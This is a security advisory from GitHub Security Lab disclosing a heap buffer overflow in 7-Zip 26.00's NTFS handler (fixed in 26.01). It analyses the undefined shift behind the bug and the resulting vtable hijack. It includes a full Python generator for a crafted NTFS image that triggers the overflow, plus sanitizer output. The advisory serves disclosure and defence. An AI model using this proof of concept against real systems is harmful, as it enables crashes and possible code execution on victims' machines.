GHSL-2026-140: Heap Buffer Write Overflow in 7-Zip

Coordinated Disclosure Timeline

2026-04-24: The report was delivered as a private SourceForge issue.
2026-04-27: v26.01 with a fix was released.

Summary

A heap buffer overflow vulnerability (GHSL-2026-140) exists in 7-Zip version 26.00. It is caused by an under-allocation of the NTFS compressed stream buffer (GetCuSize shift UB) and can potentially lead to arbitrary code execution or application crashes.

Project

7-Zip

Tested Version

v26.00

Details

Heap buffer overflow via NTFS compressed stream buffer under-allocation (`GetCuSize` shift UB) (`GHSL-2026-140`)

A heap buffer overflow vulnerability exists in the NTFS archive handler in 7-Zip that can lead to code execution via vtable hijack. The CInStream::GetCuSize() function computes the NTFS compression-unit buffer size using a 32-bit shift, (UInt32)1 << (BlockSizeLog + CompressionUnit). When an attacker-crafted NTFS image sets ClusterSizeLog to 28 (the parser accepts values up to 30) and contains a compressed data attribute with CompressionUnit == 4, the shift exponent reaches 32, which is undefined behavior in C++ for a 32-bit operand. On both x86 and x64, the UB causes _inBuf to be allocated as 1 byte. The subsequent ReadStream_FALSE call writes 256 MB of attacker-controlled data into this 1-byte buffer.

The NTFS boot sector parser accepts cluster sizes up to 2^30 bytes (CPP/7zip/Archive/NtfsHandler.cpp, line 133):

// NtfsHandler.cpp, lines 122-134
const unsigned v = p[13];
if (v <= 0x80)
{
  const int t = GetLog(v);
  if (t < 0) return false;
  sectorsPerClusterLog = (unsigned)t;
}
else
  sectorsPerClusterLog = 0x100 - v;
ClusterSizeLog = SectorSizeLog + sectorsPerClusterLog;
if (ClusterSizeLog > 30)        // allows 28, 29, 30
  return false;
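The decoding above can be mirrored in a few lines of Python to check which values of boot-sector byte 13 pass the bound. This is a minimal sketch, not 7-Zip code: cluster_size_log is a hypothetical helper, the sector size is assumed to be 512 bytes (SectorSizeLog = 9, as in the PoC), and GetLog is assumed to return the base-2 logarithm for exact powers of two and a negative value otherwise.

```python
def cluster_size_log(sectors_per_cluster_byte, sector_size_log=9):
    """Return ClusterSizeLog for boot-sector byte 13, or None if rejected."""
    v = sectors_per_cluster_byte
    if v <= 0x80:
        # Assumed GetLog behavior: only exact powers of two are accepted.
        if v == 0 or v & (v - 1):
            return None
        sectors_per_cluster_log = v.bit_length() - 1
    else:
        # "Negative" encoding: 0x100 - v is log2(sectors per cluster).
        sectors_per_cluster_log = 0x100 - v
    log = sector_size_log + sectors_per_cluster_log
    # Mirrors the parser's bound: anything above 30 is rejected.
    return None if log > 30 else log


if __name__ == "__main__":
    for b in (0x08, 0xED, 0xEB, 0xEA):
        print(hex(b), cluster_size_log(b))
```

Under these assumptions, the byte 0xED used by the PoC decodes to a cluster size log of 28, and the bound only starts rejecting at 31.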

Non-resident compressed data attributes carry CompressionUnit from the attacker-controlled attribute header (NtfsHandler.cpp:509). The value CompressionUnit == 4 is explicitly accepted (NtfsHandler.cpp:430).

The compressed stream’s buffer size is computed as:

// NtfsHandler.cpp, line 687
UInt32 GetCuSize() const { return (UInt32)1 << (BlockSizeLog + CompressionUnit); }

When BlockSizeLog == 28 and CompressionUnit == 4, the exponent is 32, which is undefined behavior (shift count >= width of the type). On x86 and x64, (UInt32)1 << 32 typically yields 1 because the hardware masks the count of a 32-bit shift to its low 5 bits (32 & 31 == 0).
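The effect of the masked shift can be modeled in Python. This is only a sketch of the typical x86/x64 hardware behavior described above, not of C++ semantics: the language gives no guarantee for this shift, and a compiler is free to produce a different value. The helper names shl32_masked and get_cu_size_model are hypothetical.

```python
def shl32_masked(value, count):
    """Model a 32-bit shift-left whose count is masked to its low 5 bits."""
    return (value << (count & 31)) & 0xFFFFFFFF


def get_cu_size_model(block_size_log, compression_unit):
    """Model of (UInt32)1 << (BlockSizeLog + CompressionUnit) on x86/x64."""
    return shl32_masked(1, block_size_log + compression_unit)


if __name__ == "__main__":
    # A conventional 4 KB cluster versus the cluster sizes discussed here.
    for log in (12, 28, 29, 30):
        print(log, get_cu_size_model(log, 4))
```

In this model a 4 KB cluster with CompressionUnit == 4 gives the expected 64 KB unit, while a cluster size log of 28 collapses to 1.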

The undersized buffer is then used:

// NtfsHandler.cpp, lines 695-697
UInt32 cuSize = GetCuSize();     // UB → 1 byte on x86/x64
_inBuf.Alloc(cuSize);           // allocates 1 byte
_outBuf.Alloc(kNumCacheChunks << _chunkSizeLog);  // x86: 2 bytes; x64: 8 GB (succeeds on >= 16 GB RAM)

NTFS uses LZNT1 compression. The two buffers serve a standard decompress pipeline:

_inBuf — holds raw compressed data read from disk (via ReadStream_FALSE)
_outBuf — holds decompressed output from Lznt1Dec(), also used as a read cache

The normal flow is: disk → _inBuf → Lznt1Dec() → _outBuf → memcpy to caller. Both buffers should be GetCuSize() bytes (one compression unit). Due to the shift UB, _inBuf gets 1 byte instead of the intended size, so the very first step — reading compressed data from disk into _inBuf — overflows:

// NtfsHandler.cpp, lines 940-941
const size_t compressed = (size_t)numChunks << BlockSizeLog;  // up to 256 MB
RINOK(ReadStream_FALSE(Stream, _inBuf + offs, compressed))    // writes into 1-byte buffer

Note that the overflow target is _inBuf, not _outBuf. On x64, even when the 8 GB _outBuf allocation succeeds, the 1-byte _inBuf is still overflowed, because the two buffer sizes are computed independently: _inBuf from the 32-bit GetCuSize() shift and _outBuf from a separate size_t shift.
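The size of the out-of-bounds write follows directly from the read length and the allocated size. The sketch below assumes a single chunk (numChunks == 1, matching the one-cluster runlist in the PoC) and a write offset of 0. overflow_bytes is a hypothetical helper, not a 7-Zip function.

```python
def overflow_bytes(num_chunks, block_size_log, buf_size, offs=0):
    """Bytes written past the end of a buf_size-byte buffer by one read."""
    read_len = num_chunks << block_size_log   # (size_t)numChunks << BlockSizeLog
    return max(0, offs + read_len - buf_size)


if __name__ == "__main__":
    # 1-byte _inBuf versus a buffer of the mathematically intended size 2**32.
    print(overflow_bytes(1, 28, buf_size=1))
    print(overflow_bytes(1, 28, buf_size=1 << 32))
```

With the 1-byte allocation, all but the first byte of the 256 MB read lands outside the buffer. A buffer of the intended 2^32 bytes would have contained it, but that value does not fit in a UInt32.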

Platform-dependent behavior

On 32-bit builds, (size_t)2 << 32 is also UB (size_t is 32-bit), yielding 2 via hardware masking. Both _inBuf.Alloc(1) and _outBuf.Alloc(2) succeed with tiny allocations, and the heap overflow is unconditionally reached.

On 64-bit builds, (size_t)2 << 32 is a valid 64-bit shift yielding 8,589,934,592 (8 GB). The _outBuf.Alloc(8 GB) call succeeds on systems with sufficient RAM (confirmed on a 64 GB machine). After the allocation succeeds, execution proceeds to ReadStream_FALSE and the same heap overflow occurs. On low-memory systems, the allocation may fail with CNewException, limiting the impact to DoS.
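The difference between the two builds can be illustrated with the same masked-shift model, parameterized on the width of size_t. This is a sketch under stated assumptions: the shift count is taken to be masked to the operand width as on typical x86/x64 hardware, kNumCacheChunks is taken to be 2 (implied by the expression (size_t)2 << 32 above), and _chunkSizeLog is taken to equal BlockSizeLog + CompressionUnit. The helper names are hypothetical.

```python
K_NUM_CACHE_CHUNKS = 2  # assumed from the "(size_t)2 << 32" expression in the text


def shl_masked(value, count, bits):
    """Shift-left on a `bits`-wide register with the count masked to the width."""
    return (value << (count & (bits - 1))) & ((1 << bits) - 1)


def buffer_sizes(chunk_size_log, size_t_bits):
    """Return modeled (_inBuf size, _outBuf size) for a given size_t width."""
    in_buf = shl_masked(1, chunk_size_log, 32)                    # UInt32 shift
    out_buf = shl_masked(K_NUM_CACHE_CHUNKS, chunk_size_log, size_t_bits)
    return in_buf, out_buf


if __name__ == "__main__":
    print("32-bit:", buffer_sizes(32, 32))
    print("64-bit:", buffer_sizes(32, 64))
```

In both cases the modeled _inBuf size is 1 byte. Only the _outBuf request differs, which is why the 64-bit case depends on whether an 8 GB allocation succeeds.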

Impact

Heap buffer overflow leading to vtable hijack (potential code execution) — 256 MB written into a 1-byte heap buffer. ReadStream_FALSE calls stream->Read() in a loop (64 KB per iteration via kBlockSize). Debugger analysis on a release /O1 build (identical codegen to official binary) shows the stream object (CInStream) is allocated only 304 bytes (0x130) after _inBuf on the heap. The first Read() iteration writes 64 KB of attacker-controlled data starting at _inBuf, overwriting the stream object’s vtable pointer after just 304 bytes. The second Read() iteration dispatches through the corrupted vtable — a classic vtable hijack. The attacker controls the written data (NTFS cluster content from the crafted image), so they control the overwritten vtable pointer.
Both x86 and x64 builds are affected. On x64, the overflow is reached on any system where the 8 GB _outBuf allocation succeeds (common on modern systems with >= 16 GB RAM).
On Windows, ReadFile fails if it detects an unmapped or guard page in the destination range before copying the controlled bytes. Attackers may need Heap Feng Shui to place _inBuf so the overwrite reaches adjacent objects without immediately faulting.
The NTFS handler is enabled in stock 7z.dll and is registered for .ntfs and .img extensions. However, 7-Zip uses signature-based fallback detection: when the format matching the file extension fails to open, all remaining handlers are tried in signature-priority order. Because the NTFS handler matches on the "NTFS    " signature at byte offset 3 (REGISTER_ARC_I in NtfsHandler.cpp:2889), a crafted NTFS image with any file extension (including .7z, .zip, .rar, or no extension at all) will be opened by the NTFS handler after the extension-matched handler rejects it. The attack surface is therefore not limited to files with NTFS-associated extensions.
The overflow is triggered during extraction or testing of a compressed file from the crafted image.
No user interaction is required beyond opening the crafted image.
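The timing of the vtable overwrite described above can be checked with simple arithmetic. The sketch below assumes that every Read() call returns a full 64 KB and writes contiguously from the start of _inBuf, and it takes the 0x130 distance from the debugger observation in the text. Both helper names are hypothetical.

```python
K_BLOCK_SIZE = 1 << 16      # 64 KB per Read() call, as stated in the text
STREAM_OBJ_OFFSET = 0x130   # distance from _inBuf to the stream object (from the text)


def iteration_overwriting(offset, block_size=K_BLOCK_SIZE):
    """Zero-based index of the Read() iteration whose write first covers `offset`."""
    return offset // block_size


def bytes_past_buffer(iterations, buf_size=1, block_size=K_BLOCK_SIZE):
    """Bytes written beyond a buf_size-byte buffer after N full iterations."""
    return max(0, iterations * block_size - buf_size)


if __name__ == "__main__":
    hit = iteration_overwriting(STREAM_OBJ_OFFSET)
    print("vtable pointer overwritten in iteration", hit)
    print("next virtual call happens in iteration", hit + 1)
    print("bytes past _inBuf after first iteration:", bytes_past_buffer(1))
```

Under these assumptions the stream object is already corrupted during the first iteration, so the very next Read() dispatch uses the attacker-supplied pointer.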

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H — 8.8 (High)
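For readers who want to reproduce the score, the following sketch evaluates the CVSS v3.1 base-score equations for a vector with Scope: Unchanged. It uses the metric weights and the Roundup function from the public CVSS v3.1 specification. base_score is a hypothetical helper and deliberately does not handle Scope: Changed.

```python
import math

WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},  # values for Scope: Unchanged
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x):
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, float-safe."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector):
    """Base score for a CVSS:3.1 vector string with S:U."""
    m = dict(part.split(":") for part in vector.split("/")[1:])
    if m["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    c, i, a = (WEIGHTS["CIA"][m[k]] for k in ("C", "I", "A"))
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 6.42 * iss
    exploitability = 8.22 * (WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
                             * WEIGHTS["PR"][m["PR"]] * WEIGHTS["UI"][m["UI"]])
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))
```

The UI:R metric is what separates this vector from the 9.8 that the same vector would receive with UI:N.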

Affected versions: The GetCuSize() computation has been present since NTFS compressed stream support was introduced. All versions through 26.00 are affected.

CWEs

CWE-787: “Out-of-bounds Write”
CWE-190: “Integer Overflow or Wraparound”

Resources

PoC generator (gen_ntfs_sparse.py) — generates poc_ntfs_sparse.ntfs (512 MB sparse NTFS image, ~8 KB actual data):

#!/usr/bin/env python3
"""Generate a sparse NTFS image with ClusterSizeLog=28 and a compressed
$DATA attribute with CompressionUnit=4 to trigger GetCuSize() UB."""
import struct, os, sys

boot = bytearray(512)
boot[0:3] = b'\xEB\x52\x90'
boot[3:11] = b'NTFS    '
struct.pack_into('<H', boot, 11, 512)
boot[13] = 0xED  # ClusterSizeLog = 28
for i in range(14, 21): boot[i] = 0
boot[21] = 0xF8
struct.pack_into('<H', boot, 24, 63)
struct.pack_into('<H', boot, 26, 255)
struct.pack_into('<Q', boot, 40, 2 << 19)  # TotalSectors
struct.pack_into('<Q', boot, 48, 1)  # MftCluster=1 -> offset 256MB
boot[64] = 0xF6
boot[68] = 0xF6
struct.pack_into('<Q', boot, 72, 0x1234567890ABCDEF)
boot[510] = 0x55; boot[511] = 0xAA

MFT_REC = 1024

def mft_rec(seq, flags, attrs, rec_num=0):
    r = bytearray(MFT_REC)
    r[0:4] = b'FILE'
    struct.pack_into('<H', r, 4, 0x30)   # UpdateSequenceOffset
    struct.pack_into('<H', r, 6, 3)      # UpdateSequenceSize (USN + one entry per sector)
    struct.pack_into('<Q', r, 8, 0)      # $LogFile sequence number
    struct.pack_into('<H', r, 16, seq)   # SequenceNumber
    struct.pack_into('<H', r, 18, 1)     # HardLinkCount
    struct.pack_into('<H', r, 20, 0x38)  # FirstAttributeOffset
    struct.pack_into('<H', r, 22, flags) # Flags (1 = in use, 2 = directory)
    bytes_in_use = (0x38 + len(attrs) + 8 + 7) & ~7
    struct.pack_into('<I', r, 24, bytes_in_use)  # BytesInUse
    struct.pack_into('<I', r, 28, MFT_REC)       # BytesAllocated
    struct.pack_into('<I', r, 0x2C, rec_num)     # MFT record number
    r[0x38:0x38+len(attrs)] = attrs
    struct.pack_into('<I', r, 0x38+len(attrs), 0xFFFFFFFF)  # end-of-attributes marker
    # Update sequence fixup: save the last two bytes of each 512-byte sector
    # in the array at 0x32/0x34, then overwrite them with the USN.
    usn = 0x0001
    struct.pack_into('<H', r, 0x30, usn)
    orig0 = struct.unpack_from('<H', r, 510)[0]
    orig1 = struct.unpack_from('<H', r, 1022)[0]
    struct.pack_into('<H', r, 0x32, orig0)
    struct.pack_into('<H', r, 0x34, orig1)
    struct.pack_into('<H', r, 510, usn)
    struct.pack_into('<H', r, 1022, usn)
    return r

def std_info():
    d = bytearray(48)
    a = bytearray(24 + len(d))
    struct.pack_into('<I', a, 0, 0x10)
    struct.pack_into('<I', a, 4, len(a))
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(d))
    a[24:24+len(d)] = d
    return a

def filename(name):
    nu = name.encode('utf-16-le')
    fn = bytearray(66 + len(nu))
    struct.pack_into('<Q', fn, 0, 5)
    fn[64] = len(name)
    fn[65] = 3
    fn[66:66+len(nu)] = nu
    raw_len = 24 + len(fn)
    padded_len = (raw_len + 7) & ~7
    a = bytearray(padded_len)
    struct.pack_into('<I', a, 0, 0x30)
    struct.pack_into('<I', a, 4, padded_len)
    a[8] = 0
    struct.pack_into('<H', a, 14, 0x18)
    struct.pack_into('<I', a, 16, len(fn))
    a[24:24+len(fn)] = fn
    return a

def compressed_data():
    rl = bytes([0x11, 0x01, 0x01, 0x00])  # 1 cluster at LCN 1
    hdr_size = 0x48
    sz = (hdr_size + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 0x10, 0)     # LowVcn
    struct.pack_into('<Q', a, 0x18, 0)     # HighVcn
    struct.pack_into('<H', a, 0x20, hdr_size)  # RunlistOffset
    a[0x22] = 4                            # CompressionUnit = 4
    cs = 1 << 28
    struct.pack_into('<Q', a, 0x28, cs)    # AllocatedSize
    struct.pack_into('<Q', a, 0x30, 100)   # Size
    struct.pack_into('<Q', a, 0x38, 100)   # InitializedSize
    struct.pack_into('<Q', a, 0x40, cs)    # PackSize
    a[hdr_size:hdr_size+len(rl)] = rl
    return a

def mft_data_attr(num_records):
    rl = bytes([0x11, 0x01, 0x01, 0x00])
    sz = (72 + len(rl) + 7) & ~7
    a = bytearray(sz)
    struct.pack_into('<I', a, 0, 0x80)
    struct.pack_into('<I', a, 4, sz)
    a[8] = 1
    struct.pack_into('<Q', a, 16, 0)
    struct.pack_into('<Q', a, 24, 0)
    struct.pack_into('<H', a, 32, 0x40)
    struct.pack_into('<H', a, 34, 0)       # CompressionUnit = 0
    data_size = num_records * MFT_REC
    struct.pack_into('<Q', a, 40, 1 << 28)
    struct.pack_into('<Q', a, 48, data_size)
    struct.pack_into('<Q', a, 56, data_size)
    a[0x40:0x40+len(rl)] = rl
    return a

num_mft_records = 7
mft  = mft_rec(1, 1, std_info() + mft_data_attr(num_mft_records), rec_num=0)
for i in range(1, 5):
    mft += mft_rec(i+1, 1, std_info(), rec_num=i)
mft += mft_rec(1, 3, std_info(), rec_num=5)  # root dir
mft += mft_rec(1, 1, std_info() + filename("test.txt") + compressed_data(), rec_num=6)

mft_off = 1 << 28   # 256 MB
phy_size = 2 << 28   # 512 MB
out = sys.argv[1] if len(sys.argv) > 1 else "poc_ntfs_sparse.ntfs"
with open(out, 'wb') as f:
    f.write(boot)
    f.seek(mft_off)
    f.write(mft)
    f.seek(phy_size - 1)
    f.write(b'\x00')

print(f"Generated: {out} ({os.stat(out).st_size} bytes apparent)")

Usage: python3 gen_ntfs_sparse.py [output_path]

The PoC constructs a hand-crafted NTFS image with ClusterSizeLog = 28 (256 MB clusters), 7 MFT records at offset 256 MB, and a compressed $DATA attribute with CompressionUnit = 4. Standard NTFS formatting tools such as mkntfs cannot produce clusters anywhere near this size, so the entire MFT structure is synthesized from scratch with correct:

Boot sector with SectorsPerCluster = 0xED (negative encoding for ClusterSizeLog = 28)
USN fixup arrays at sector boundaries
8-byte-aligned attribute records ($STANDARD_INFORMATION, $FILE_NAME, $DATA)
Non-resident $DATA runlists within NumClusters bounds
Compressed attribute header with PackSize field at offset 0x40
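The USN fixup item in the list above is the least obvious one, so here is a sketch of how a reader would validate and undo the fixups that the generator writes. It assumes 512-byte sectors and the record layout used by the PoC (update sequence array offset at byte 4, entry count at byte 6). apply_fixups and undo_fixups are hypothetical helpers, not 7-Zip functions.

```python
import struct

SECTOR = 512  # assumed sector size, as in the PoC boot sector


def apply_fixups(record, usn=1, usa_off=0x30):
    """Protect a record the way the PoC's mft_rec does: stash sector tails, write the USN."""
    rec = bytearray(record)
    count = len(rec) // SECTOR + 1               # USN itself + one entry per sector
    struct.pack_into('<HH', rec, 4, usa_off, count)
    struct.pack_into('<H', rec, usa_off, usn)
    for i in range(1, count):
        end = i * SECTOR - 2                     # last two bytes of sector i-1
        saved = usa_off + 2 * i
        rec[saved:saved + 2] = rec[end:end + 2]
        struct.pack_into('<H', rec, end, usn)
    return bytes(rec)


def undo_fixups(record):
    """Check each sector tail against the USN and restore the saved bytes."""
    rec = bytearray(record)
    usa_off, count = struct.unpack_from('<HH', rec, 4)
    usn = bytes(rec[usa_off:usa_off + 2])
    for i in range(1, count):
        end = i * SECTOR - 2
        if bytes(rec[end:end + 2]) != usn:
            raise ValueError(f"fixup mismatch in sector {i - 1}")
        saved = usa_off + 2 * i
        rec[end:end + 2] = rec[saved:saved + 2]
    return bytes(rec)


if __name__ == "__main__":
    protected = apply_fixups(b'\xAB' * 1024)
    print(protected[510:512], undo_fixups(protected)[510:512])
```

A parser that performs this check rejects records whose sector tails do not match the USN, which is why the generator has to write the fixup array consistently.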

Verification

Confirmed with UBSan.

UBSan (clang, Linux x64, recovery mode)

Confirms the root-cause shift UB regardless of platform:

../../Archive/NtfsHandler.cpp:687:47: runtime error: shift exponent 32 is too large
    for 32-bit type 'UInt32' (aka 'unsigned int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior
    ../../Archive/NtfsHandler.cpp:687:47

After the UB, cascading corruption leads to a SEGV:

../../Common/StreamUtils.cpp:62:27: runtime error: member call on address 0x5d3dd8f776f0
    which does not point to an object of type 'ISequentialInStream'
    note: object has invalid vptr
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==60==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000018
==60==Hint: address points to the zero page.

CVE

CVE-2026-48095

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2026-140 in any communication regarding this issue.